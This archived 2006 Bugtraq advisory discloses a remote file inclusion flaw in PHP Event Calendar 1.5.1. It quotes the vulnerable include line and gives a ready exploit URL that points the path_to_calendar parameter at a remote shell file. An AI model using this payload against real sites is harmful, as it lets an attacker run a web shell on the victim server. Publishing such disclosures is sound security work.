lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 28 Nov 2006 00:24:20 +0000
From: "philip anselmo" <spoonman500@...mail.com>
To: bugtraq@...urityfocus.com
Subject: PHP Event Calendar 1.5.1 (index.php) Remote File Include Vulnerability

Title : PHP Event Calendar 1.5.1 (index.php) Remote File Include 
Vulnerability
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------
Sorce Code:
**********
http://www.scriptdungeon.com/jump.php?ScriptID=633

Affected software description :
******************************
Title: PHP Event Calendar
// URL: http://www.softcomplex.com/products/php_event_calendar/
// Version: 1.5.1
// Date: 03/04/2005 (mm/dd/yyyy)
// Tech. support: http://www.softcomplex.com/forum/forumdisplay.php?fid=55
Catégorie :Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
include $path_to_calendar."calendar.php";

affected file: cl_files/index.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/cl_files/index.php?path_to_calendar=Shell.txt?


------------------------------------------------------------------------
----

greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF 
& all my friends

Special Greeting:AsbMay's Group & TrYaG TeaM

channel:www.asb-may.net & www.tryag.com

contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@...mail.com

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ